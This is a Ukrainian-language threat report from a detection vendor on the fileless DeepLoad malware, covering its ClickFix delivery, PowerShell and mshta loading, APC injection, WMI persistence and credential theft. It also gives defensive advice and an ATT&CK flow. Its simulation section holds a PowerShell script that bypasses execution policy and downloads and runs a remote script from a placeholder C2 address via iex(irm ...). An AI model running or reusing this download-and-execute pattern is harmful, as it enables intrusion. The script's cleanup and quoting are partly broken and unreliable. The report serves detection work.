SOC Prime Bias: Середній

07 Apr 2026 18:16
newspaper icon ReliaQuest

Шкідливе програмне забезпечення DeepLoad поєднує доставку ClickFix із уникаючими методами, створеними за допомогою ІІ

Author Photo
Ruslan Mikhalov Керівник досліджень загроз у SOC Prime linkedin icon Стежити
Шкідливе програмне забезпечення DeepLoad поєднує доставку ClickFix із уникаючими методами, створеними за допомогою ІІ
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Резюме

DeepLoad – це безфайлове шкідливе програмне забезпечення, яке розповсюджується через соціальну інженерію ClickFix. Воно спирається на обфускований завантажувач PowerShell, ін’єкцію шелкоду в пам’ять в надійні процеси Windows і згенерований AI «шум» для зниження точності статичного виявлення. Завантажувач забезпечує стійкість, використовуючи розкладене завдання і підписки на події WMI, може поширюватися через USB-носії, а також краде облікові дані через підроблений браузерний розширення та супутній компонент filemanager.exe.

Розслідування

Звіт описує початковий доступ, який починається з виконання жертвою команди PowerShell, після чого завантажувач отримується через mshta.exe. Завантажувач використовує Add-Type для генерації тимчасового DLL під час виконання, а потім ін’єктує шелкод у LockAppHost.exe за допомогою ін’єкції на основі APC. Постійність підтримується через розкладене завдання і приховану підписку на події WMI, здатну відновлювати інфекцію навіть після очищення, з відзначеним вікном затримки приблизно в три дні. Викрадення облікових даних приписується filemanager.exe разом з підробленим браузерним розширенням, що працює паралельно.

Захист

Увімкніть PowerShell Script Block Logging і відстежуйте підозрілі ланцюги виконання PowerShell. Аудитьте мережеву активність mshta.exe, моніторьте несподіване створення розкладених завдань і виявляйте аномальне використання QueueUserAPC, що вказує на ін’єкцію APC. Під час відновлення чітко перелічте й видаліть підписки на події WMI, а не покладайтеся лише на очищення файлів/реєстру. Змініть скомпрометовані облікові дані та видаліть несанкціоновані розширення браузера, щоб перекрити шляхи збору облікових даних.

Відповідь

Якщо виявлено активність DeepLoad, ізолюйте хост, зупиніть шкідливу активність PowerShell та завершіть всі ін’єктовані процеси. Видаліть розкладене завдання та видаліть пов’язану підписку WMI, а потім викоріньте filemanager.exe та шкідливе розширення браузера. Змініть всі потенційно скомпрометовані облікові дані, очистіть підключені USB-носії та переконайтеся, що система перевірена на залишкові артефакти ін’єкції, перш ніж знову повернути її в експлуатацію.

Ключові слова: DeepLoad, ClickFix, безфайлове шкідливе ПЗ, завантажувач PowerShell, mshta.exe, Add-Type, шелкод у пам’яті, ін’єкція APC, QueueUserAPC, LockAppHost.exe, постійність розкладених завдань, підписка на події WMI, поширення через USB, шкідливе розширення браузера, викрадення облікових даних.

“graph TB %% Class definitions classDef action fill:#99ccff %% Node definitions step_user_exec[“<b>Дія</b> – <b>T1204.004 Виконання користувача: Зловмисне копіювання і вставка</b><br/>Жертва запускає команду PowerShell через ClickFix.”] class step_user_exec action step_powershell[“<b>Дія</b> – <b>T1059.001 Команда та інтерпретатор сценаріїв: PowerShell</b><br/>Завантаження завантажувача за допомогою Invoke-Expression (IEX).”] class step_powershell action step_mshta[“<b>Дія</b> – <b>T1218.005 Виконання системного бінарника-посередника: Mshta</b><br/>mshta.exe отримує віддалений сценарій.”] class step_mshta action step_schtask[“<b>Дія</b> – <b>T1053 Розкладене завдання/робота</b><br/>Створення завдання стійкості для повторного запуску завантажувача.”] class step_schtask action step_injection[“<b>Дія</b> – <b>T1055.004 Ін’єкція процесу: Асинхронний виклик процедури</b><br/>Ін’єкція шелкоду у LockAppHost.exe.”] class step_injection action step_reflective[“<b>Дія</b> – <b>T1620 Рефлективне завантаження коду</b><br/>Компільовка DLL в пам’яті через Add-Type.”] class step_reflective action step_masquerade[“<b>Дія</b> – <b>T1036.003 Маскування: Перейменування легітимних утиліт</b><br/>Використовує filemanager.exe та .lnk ярлики.”] class step_masquerade action step_removable[“<b>Дія</b> – <b>T1091 Реплікація через знімні носії / T1080 Зараження спільного контенту</b><br/>Розміщує зловмисні ярлики на USB накопичувачах.”] class step_removable action step_wmi[“<b>Дія</b> – <b>T1546.003 Виклик по події: Підписка на події WMI</b><br/>Зберігається і повторно виконується після очищення.”] class step_wmi action step_keylog[“<b>Дія</b> – <b>T1056.001 Захоплення введення: Кейлогінг</b><br/>Захоплення натискань клавіш для облікових даних.”] class step_keylog action step_cred[“<b>Дія</b> – <b>T1555.003 Облікові дані з веб-браузерів / T1176 Програмні розширення</b><br/>Зловмисне розширення браузера краде збережені паролі.”] class step_cred action step_valid[“<b>Дія</b> – <b>T1078 Дійсні облікові записи</b><br/>Атакуючий використовує отримані облікові дані.”] class step_valid action step_c2[“<b>Дія</b> – <b>T1102.002 Двостороннє спілкування через веб-сервіс / T1102.003 Одностороннє$lt;/b><br/>Канали C2 і ексфільтрація.”] class step_c2 action %% Connections step_user_exec –>|торкається| step_powershell step_powershell –>|завантаження через| step_mshta step_mshta –>|виконує| step_schtask step_schtask –>|створює| step_injection step_injection –>|ін’єктує в| step_reflective step_reflective –>|завантажує| step_masquerade step_masquerade –>|розміщує ярлики на| step_removable step_removable –>|включає| step_wmi step_wmi –>|активує| step_keylog step_keylog –>|захоплює облікові дані для| step_cred step_cred –>|надає| step_valid step_valid –>|сприяє| step_c2 “

Потік атаки

Виконання симуляції

Передумова: перевірка телеметрії та базової лінії має бути успішною.

Опис: цей розділ детально описує точне виконання техніки супротивника (TTP), призначеної для активації правила виявлення. Команди і нарратив МАЮТЬ безпосередньо відображати ідентифіковані TTP і мають на меті генерувати точну телеметрію, очікувану логікою виявлення. Абстрактні або нерелевантні приклади призведуть до помилкового діагнозу.

  • Опис атаки та команди:

    1. Початковий плацдарм: Атакуючий має PowerShell сесію з низькими привілеями на хості жертви.
    2. Обхід політики виконання: Вони запускають PowerShell з параметром -ep Bypass щоб ігнорувати будь-які обмеження виконання сценарію.
    3. Компільовка навантаження .NET: Використовуючи Add-Type, вони вбудовують крихітний клас на C#, який, при створенні, здійснює веб-запит до C2 сервера (http://10.0.0.5:3015/index).
    4. Завантаження та виконання віддаленого сценарію: Атакуючий передає результат irm (Invoke‑RestMethod) в iex, виконуючи зловмисний сценарій у пам’яті.
    5. Результуюча телеметрія: Командний рядок, записаний ОС, містить три необхідні рядки (-ep Bypass, Add-Type, iex(irm http://…:3015/index)), що відповідає правилу Sigma.

  • Скрипт регресійного тестування:

    # Зловмисне виконання, подібне до DeepLoad
# Цей сценарій відтворює точний шаблон команд, необхідний для запуску правила Sigma.
$c2 = "http://10.0.0.5:3015/index"
$payload = @"
using System;
using System.Net;
public class Loader {
public static void Run() {
    new WebClient().DownloadString(""$c2"");
}
}
"@
# Виклик PowerShell з прапором обходу, компіляція навантаження, а потім виконання віддаленого сценарію
powershell -NoProfile -ExecutionPolicy Bypass -Command `
    "Add-Type -TypeDefinition `$payload; `
     iex (irm $c2)"

  • Команди очищення:

    # Видаліть будь-які тимчасові файли або завантажені збірки (якщо вони були збережені)
Remove-Item -Path "$env:TEMPloader.dll" -ErrorAction SilentlyContinue
# При необхідності, очистіть транскрипцію PowerShell (якщо ввімкнено)
Clear-Host

Кінець звіту

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно